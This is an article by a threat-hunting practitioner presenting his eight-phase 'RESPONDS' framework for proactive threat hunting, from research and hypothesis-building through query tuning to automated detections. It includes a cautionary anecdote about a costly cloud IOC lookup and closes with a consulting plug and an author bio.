Threat hunting is not simply about reacting to alerts; it’s about proactively searching for threats that have not yet been detected by technology. This typically involves several phases which I’ve compiled into an easy to remember framework called the RESPONDS Threat Hunting Framework.
The RESPONDS Threat Hunting Framework provides a structured, repeatable methodology for conducting hunts across an environment. It guides hunters through eight distinct yet interconnected phases, from research to scaling operations.
RESPONDS is an acronym representing the following sequential phases:
- Research
- Establish Hypothesis
- Scope Hunt
- Plan & Develop Hunt
- Observe
- Notify & Execute
- Diagnose & Tune
- Scale
Each phase contains specific activities and delivers tangible outcomes that feed into the next step. Let’s explore each in detail.
The Research phase lays the groundwork for the hunt. Hunters collect and analyze various intelligence sources such as:
- Threat feeds
- OSINT
- Dark web activity
- Vendor reports
- Human intelligence (HUMINT)
- Social media
- Security blogs
The outcome of this phase is the identification of IOCs, TTPs, and potential attack scenarios to inform the hypothesis.
In the Establish Hypothesis phase, using the research results from the first phase, hunters create one or more hypotheses around potential threat actor behavior. This can includes:
- Defining threat scenarios
- Prioritizing risk areas (e.g., business-critical systems, high value targets, and crown jewels)
- Crafting analytical questions
The outcome of this phase is to have clear, testable hypotheses to drive the hunt’s objectives.
Scope Hunt – here, the hunter defines the parameters of the hunt. This can be a structured hunt (based on known behaviors, TTPs, or attack patterns), unstructured (focuses on a reactive, intel-based hunting model that examines atomic indicators), or situational (also known as entity-based, focusing on key users, assets, endpoints, data that are at risk of compromise, or “crown jewels”). The outcome of this phase is to have a decision on which hunting approach to use—structured, unstructured, or situational.
As the hunter progresses to the Plan & Develop Hunt phase, the hunter translates the hypothesis into technical queries to prove or disprove the theory. In most cases, this activity will be conducted in a Security Information and Event Management (SIEM) like Splunk, Qradar, or Elastic, however data may be stored in a database, log, or data lake that requires querying or regular expression to extract data of interest. While not ideal, if central logging isn’t available, hunters may take samples of timeframe or select systems to test their hypothesis. The outcome of the Plan & Develop Hunt phase is a hunt query that looks for indication of the suspected malicious activity.
In the Observe phase, this is where the rubber meets the road. Analysts test their hypotheses by validating the hunt logic, simulating true positives (for testing), or potentially leveraging red team activity to test detection capabilities. The outcome of this phase is a validated artifact that allows the hunter to prove or disprove the hypothesis.
In the Notify & Execute phase, the hunt logic is triggered in real-time against data as events are written, initiated manually at points in time, or run automatically at set intervals (e.g. daily). If the hunt logic returns results, a hunter needs to validate the finding and escalate it to responders. The outcome of this phase is either a notification due to findings or a documented false positive. Absence of threat hunt findings should be communicated to stakeholders.
After initial execution, the Diagnose & Tune phase ensures precision and efficiency as the hunt continues to be executed. I was once working with a customer who wasn’t seeing the value in the threat hunting service we were providing and the time to decide if they wanted to purchase the service or drop it was days away. We had a database with over 8 million IOCs, so after some discussion, we made the decision to do a mass lookup of IOCs written to our collection in the last 7 days (approximately 90,000 entries) against 30 days of the customer’s logs stored in a cloud hosted database. A couple days later, I was called into a meeting with our finance team and asked to explain the spike in AWS spend that cost the company $20,000 in one day. It was an expensive mistake and a great lesson in why tuning hunts can be incredibly important. In the Diagnose & Tune phase, include and exclude statements can be appended, false positives are removed to minimize noise, and queries are refined to run optimally on your technology stack. The ideal outcome in this phase is a reduction in noise and improved fidelity in future detections.
The final phase of the RESPONDS framework is Scale. Successful hunts should not be one-offs. Each hunter has limited time, they won’t be at the organization forever, and they need time off. Relying on humans to conduct daily hunts when they could be automated is a waste of resources. In the Scale phase the goal is minimize human involvement where possible, activities includes: Automating detection rules, documenting findings, converting logic to detection-as-code, creating permanent, and scalable detections. The outcome for this phase is a robust set of automated (or semi-automated) detections to protect against similar future threats.
The RESPONDS framework includes a feedback loop where findings—positive or not—are fed back into the Threat Intelligence pool and Lessons Learned documentation. This ensures organizational knowledge is continuously updated and future hunts are more refined. The RESPONDS framework transforms ad-hoc threat hunting into a disciplined, iterative process. It promotes collaboration across teams, improves detection accuracy, and ultimately elevates your organization’s threat hunting maturity.
To dive deeper into threat hunting strategies or schedule a consulting call, visit TheMikeWylie.com or connect with Michael Wylie on LinkedIn (https://www.linkedin.com/in/mwylie).
About the Author
Michael Wylie, MBA, CISSP leads a global managed threat hunting team at Zscaler and has built world-class detection programs across the public and private sectors. A former Director of Threat Hunting at CrowdStrike and a top 100 accounting firm, he specializes in DFIR, threat hunting, and operationalizing AI in SecOps. Michael is also a trusted author and educator, having trained tens of thousands of cybersecurity professionals globally.